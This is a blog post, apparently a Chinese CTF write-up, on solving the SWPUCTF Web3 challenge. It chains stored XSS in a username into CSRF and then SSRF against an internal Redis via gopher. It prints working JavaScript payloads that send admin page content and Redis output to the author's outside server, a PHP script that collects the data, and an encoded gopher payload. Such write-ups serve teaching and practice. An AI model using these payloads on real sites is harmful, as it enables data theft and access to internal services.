<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>SWPUCTF -- Web3 | You Only Live Once</title>
  <meta name="description" content="对着WriteUp复盘还是遇到了不少问题，也学到了很多Trick XSS注册用户名处可以构造XSS，那么我们可以使用这个XSS来引用外部的js文件 1&lt;script src&#x3D;https:&#x2F;&#x2F;yoloyolo.top&#x2F;1.js&gt;&lt;&#x2F;script&gt; Payload1如下 123456&#x2F;&#x2F;Payload1 Fo">
<meta property="og:type" content="article">
<meta property="og:title" content="SWPUCTF -- Web3">
<meta property="og:url" content="https://yoloyolo.top/2021/01/14/SWPUCTF-Web3/index.html">
<meta property="og:site_name" content="Transmutation">
<meta property="og:description" content="对着WriteUp复盘还是遇到了不少问题，也学到了很多Trick XSS注册用户名处可以构造XSS，那么我们可以使用这个XSS来引用外部的js文件 1&lt;script src&#x3D;https:&#x2F;&#x2F;yoloyolo.top&#x2F;1.js&gt;&lt;&#x2F;script&gt; Payload1如下 123456&#x2F;&#x2F;Payload1 Fo">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-01-14T13:25:50.000Z">
<meta property="article:modified_time" content="2021-01-14T13:28:06.000Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="CSRF">
<meta property="article:tag" content="SSRF">
<meta name="twitter:card" content="summary">
  <!-- Canonical links -->
  <link rel="canonical" href="https://yoloyolo.top/2021/01/14/SWPUCTF-Web3/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Transmutation" type="application/atom+xml">
  
  
    <link rel="icon" href="/logo_icon.svg" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.3.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/monster414" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.png" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">xXxYOLOxXx</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">yolo-yolo@qq.com</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Xiamen, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">Links</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/monster414" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>Welcom to xXxYOLOxXx's Blog</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">Categories</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Study/">Study</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Talk/">Talk</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/WriteUp/">WriteUp</a><span class="category-list-count">3</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/AWD/" style="font-size: 13px;">AWD</a> <a href="/tags/CBC/" style="font-size: 13px;">CBC</a> <a href="/tags/CSRF/" style="font-size: 13px;">CSRF</a> <a href="/tags/CVE/" style="font-size: 13px;">CVE</a> <a href="/tags/Crypto/" style="font-size: 13.5px;">Crypto</a> <a href="/tags/ECB/" style="font-size: 13px;">ECB</a> <a href="/tags/FTP/" style="font-size: 13px;">FTP</a> <a href="/tags/File-Upload/" style="font-size: 13px;">File Upload</a> <a href="/tags/PHP/" style="font-size: 14px;">PHP</a> <a href="/tags/RCE/" style="font-size: 14px;">RCE</a> <a href="/tags/RSA/" style="font-size: 13.5px;">RSA</a> <a href="/tags/Reflection/" style="font-size: 13px;">Reflection</a> <a href="/tags/SQL-Injection/" style="font-size: 13px;">SQL Injection</a> <a href="/tags/SSRF/" style="font-size: 13px;">SSRF</a> <a href="/tags/Talk/" style="font-size: 13px;">Talk</a> <a href="/tags/Unserialize/" style="font-size: 13px;">Unserialize</a> <a href="/tags/WEB/" style="font-size: 13px;">WEB</a> <a href="/tags/Web/" style="font-size: 13px;">Web</a> <a href="/tags/XSS/" style="font-size: 13px;">XSS</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/WriteUp/">WriteUp</a>
              </p>
              <p class="item-title">
                <a href="/2021/01/14/SWPUCTF-Web3/" class="title">SWPUCTF -- Web3</a>
              </p>
              <p class="item-date">
                <time datetime="2021-01-14T13:25:50.000Z" itemprop="datePublished">2021-01-14</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/WriteUp/">WriteUp</a>
              </p>
              <p class="item-title">
                <a href="/2021/01/14/SWPUCTF-Crypto/" class="title">SWPUCTF -- Crypto</a>
              </p>
              <p class="item-date">
                <time datetime="2021-01-14T13:17:44.000Z" itemprop="datePublished">2021-01-14</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/Study/">Study</a>
              </p>
              <p class="item-title">
                <a href="/2021/01/14/Crypto-RSA/" class="title">Crypto -- RSA</a>
              </p>
              <p class="item-date">
                <time datetime="2021-01-14T13:07:07.000Z" itemprop="datePublished">2021-01-14</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/WriteUp/">WriteUp</a>
              </p>
              <p class="item-title">
                <a href="/2021/01/14/CTF-Sloves/" class="title">CTF题解&amp;杂记</a>
              </p>
              <p class="item-date">
                <time datetime="2021-01-14T12:42:49.000Z" itemprop="datePublished">2021-01-14</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/Study/">Study</a>
              </p>
              <p class="item-title">
                <a href="/2021/01/14/PHP-RCE-Without-Parameters/" class="title">PHP无参数RCE</a>
              </p>
              <p class="item-date">
                <time datetime="2021-01-14T12:27:25.000Z" itemprop="datePublished">2021-01-14</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-SWPUCTF-Web3" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      SWPUCTF -- Web3
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2021/01/14/SWPUCTF-Web3/" class="article-date">
	  <time datetime="2021-01-14T13:25:50.000Z" itemprop="datePublished">2021-01-14</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/WriteUp/">WriteUp</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/CSRF/" rel="tag">CSRF</a>, <a class="article-tag-link-link" href="/tags/SSRF/" rel="tag">SSRF</a>, <a class="article-tag-link-link" href="/tags/Web/" rel="tag">Web</a>, <a class="article-tag-link-link" href="/tags/XSS/" rel="tag">XSS</a>
  </span>


        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2021/01/14/SWPUCTF-Web3/#comments" class="article-comment-link">Comments</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <p>对着WriteUp复盘还是遇到了不少问题，也学到了很多Trick</p>
<h1 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h1><p>注册用户名处可以构造XSS，那么我们可以使用这个XSS来引用外部的js文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src&#x3D;https:&#x2F;&#x2F;yoloyolo.top&#x2F;1.js&gt;&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
<p>Payload1如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;Payload1 For XSS</span><br><span class="line">var source1 &#x3D; document.documentElement.outerHTML;</span><br><span class="line">GetData(source1);</span><br><span class="line">txt&#x3D;escape(source);</span><br><span class="line">var newimg &#x3D; new Image();</span><br><span class="line">newimg.src&#x3D;&quot;https:&#x2F;&#x2F;yoloyolo.top&#x2F;1.php?key&#x3D;&quot;+&quot;\n&quot;+txt+&quot;\n&quot;;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$file&#x3D;&quot;new&quot;;</span><br><span class="line">file_put_contents($file,$_REQUEST[&#39;key&#39;],FILE_APPEND);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>由于这里被设置了HTTPOnly，不能使用XSS来盗取Cookie，只能先获取admin后台页面的内容<br>根据内容再进行后续的操作</p>
<p>返回的HTML源码中可以看到以下内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action&#x3D;&quot;.&#x2F;ssrf_for_test.php&quot; method&#x3D;&quot;GET&quot;&gt;&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;url&quot; placeholder&#x3D;&quot;Input url...&quot;&gt;&lt;input type&#x3D;&quot;submit&quot; name&#x3D;&quot;submit&quot; value&#x3D;&quot;%u83B7%u53D6%u8D44%u6E90&quot;&gt;&lt;&#x2F;form&gt;</span><br></pre></td></tr></table></figure>
<p>普通用户去访问./ssrf_for_test.php则会提示权限不足<br>但是可以使用XSS来进一步构造CSRF，去读取php的显示内容</p>
<h1 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h1><p>这里我们直接更改1.js的内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;Payload2 For XSS+CSRF</span><br><span class="line">var httpreq &#x3D; new XMLHttpRequest();</span><br><span class="line">httpreq.open(&#39;GET&#39;,&#39;http:&#x2F;&#x2F;192.168.56.103:40090&#x2F;ssrf_for_test.php&#39;,false);</span><br><span class="line">httpreq.send();</span><br><span class="line">var img &#x3D; new Image();</span><br><span class="line">img.src &#x3D; &quot;https:&#x2F;&#x2F;yoloyolo.top&#x2F;1.php?key&#x3D;&quot;+&quot;\n&quot;+escape(httpreq.responseText);</span><br></pre></td></tr></table></figure>
<p>直接构造XMLHttpRequest请求来读取php的显示内容<br>得到的结果为 <code>只允许http|https|gopher协议</code><br>结合题目所给出的提示，flag在redis中，那么可以利用CSRF来进行SSRF</p>
<h1 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;Payload3 For XSS+CSRF+SSRF</span><br><span class="line">var httpreq &#x3D; new XMLHttpRequest();</span><br><span class="line">httpreq.open(&#39;GET&#39;,&#39;http:&#x2F;&#x2F;192.168.56.103:40090&#x2F;ssrf_for_test.php?url&#x3D;gopher:&#x2F;&#x2F;127.0.0.1:6379&#x2F;_*1%250d%250a%247%250d%250aCOMMAND%250d%250a*2%250d%250a%243%250d%250aget%250d%250a%244%250d%250aflag%250d%250aquit&#39;,false);</span><br><span class="line">httpreq.send();</span><br><span class="line">var httpreq2 &#x3D; new XMLHttpRequest();</span><br><span class="line">httpreq2.open(&#39;POST&#39;,&#39;https:&#x2F;&#x2F;yoloyolo.top&#x2F;1.php&#39;,false);</span><br><span class="line">httpreq2.setRequestHeader (&#39;Content-type&#39;, &#39;application&#x2F;x-www-form-urlencoded&#39;);</span><br><span class="line">httpreq2.send(&quot;key&#x3D;&quot;+escape(httpreq.responseText));</span><br></pre></td></tr></table></figure>
<p>先构造SSRF，从redis中读取flag，再将读取到的内容用POST的方法发送到用于接收的php<br>流量部分可以用Wireshark抓包来观察，得到的结果为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">*1</span><br><span class="line">$7</span><br><span class="line">COMMAND</span><br><span class="line">*2</span><br><span class="line">$3</span><br><span class="line">get</span><br><span class="line">$4</span><br><span class="line">flag</span><br></pre></td></tr></table></figure>
<p>但是后面必须加一个quit，否则会一直与redis连接，无法得到回显结果<br>这个quit在对redis抓包时并没有看到，而且在redis客户端中使用quit和exit都可以退出，但是在使用gopher协议时只有quit生效</p>
<p>放在js中的时候必须进行双重URL编码，否则无效</p>
<p>这里如果还是使用img标签来用GET方法传递参数的话，则会出现 <code>HTTP 414 Request-URI Too Long</code> 的错误，所以只能POST的方法<br>但是使用XMLHttpRequest请求去访问跨域资源时(CORS)，会因为浏览器的同源策略造成一些影响，可能就不会去加载资源，但是对获取flag没有影响<br>不过在查阅一些资料之后理清楚了过程</p>
<p>客户端带着redis打出来的数据对远程服务端进行跨域请求<br>远程服务端响应包的头部没有设置 <code>Access-Control-Allow-Origin</code><br>客户端禁止载入远程客户端的资源<br>不过在第一步时，由于带着数据进行请求了，那么php自然就把数据写入文件中了<br>这个问题可以在apache的配置文件中添加Access-Control-Allow-Origin来进行解决，但是对于本题来说有点画蛇添足</p>
<p>一篇题目相似的WP：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/156377#h2-0">https://www.anquanke.com/post/id/156377#h2-0</a></p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://yoloyolo.top/2021/01/14/SWPUCTF-Web3/" title="SWPUCTF -- Web3" target="_blank" rel="external">https://yoloyolo.top/2021/01/14/SWPUCTF-Web3/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/monster414" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.png" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/monster414" target="_blank"><span class="text-dark">xXxYOLOxXx</span><small class="ml-1x">yolo-yolo@qq.com</small></a></h3>
        <div>Explorer for unknown.</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    
    <li class="next">
      <a href="/2021/01/14/SWPUCTF-Crypto/" title="SWPUCTF -- Crypto"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/monster414" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>